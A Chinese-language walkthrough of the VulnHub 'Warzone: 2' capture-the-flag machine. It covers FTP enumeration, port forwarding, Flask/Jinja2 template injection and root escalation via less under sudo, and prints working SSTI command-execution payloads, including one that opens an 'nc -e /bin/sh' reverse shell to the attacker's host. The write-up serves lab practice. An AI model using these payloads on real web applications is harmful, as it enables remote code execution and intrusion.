vulnhub - Warzone: 2 - Warzone

由 admin 发布

靶机描述

Enumeration, Flask, Port Forwarding, GTFObins

Created and Tested in Virtual box (NAT network)

Hint : lowercase letters

下载 https://www.vulnhub.com/entry/warzone-2,598/

清单

  • 信息搜集

    • netdiscover
    • ftp (获得user、pass)
  • 利用

    • 1337
    • 端口转发
    • ssti 注入
  • 提权

    • less (!/bin/bash)

信息搜集

靶机IP

image-20201122210738267

端口扫描

nmap 192.168.34.170 -p-

Not shown: 65532 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
1337/tcp open  waste

ftp

Name ftp
passwd 空

image-20201122194033133

下载得到图片

image-20201122194142574

解密 https://www.dcode.fr/semaphore-flag1

image-20201122194416517

低权限用户 www-data

将得到的 用户密码 加密得到 token

image-20201122194604791

nc 192.168.34.170 1337

输入得到的用户密码

image-20201122194532645

由于 连接到 1337 端口的shell受限,所以需要使用nc反弹shell来突破受限的shell

攻击机监听

image-20201122194913492

靶机

image-20201122211138196

在 warzone2-socket-server 得到 .mysshpassword

得到密码
i_hate_signals!

image-20201122195625348

移动至 flagman

通过得到的密码切换至 flagman

sudo -l

发现有可以允许的 python 文件

image-20201122204702157

运行后监听 5000端口

由于 监听的 127.0.0.1所以不能外部访问

需要端口转发

image-20201122204757088

netstat -antlp

image-20201122204836040

端口转发

http://www.vuln.cn/wp-content/uploads/2016/06/lcx_vuln.cn_.zip 2

image-20201122205136263

获得 admiral 用户

开启端口转发后就可以访问 1234端口了

image-20201122205244125

传入 ?search={{8*8}} 3

image-20201122205526704

命令执行

?search={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}

image-20201122202653656

Nc

nc -lvp 5566

image-20201122205653604

web

payload

?search={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('
nc -e /bin/sh 192.168.34.159 5566').read()") }}{% endif %}{% endfor %}

得到shell

image-20201122205821895

root

less 4

image-20201122205854913

在返回结果处

按回车 输入 !/bin/bash 得到root

image-20201122205947487

参考


暂无评论

发表评论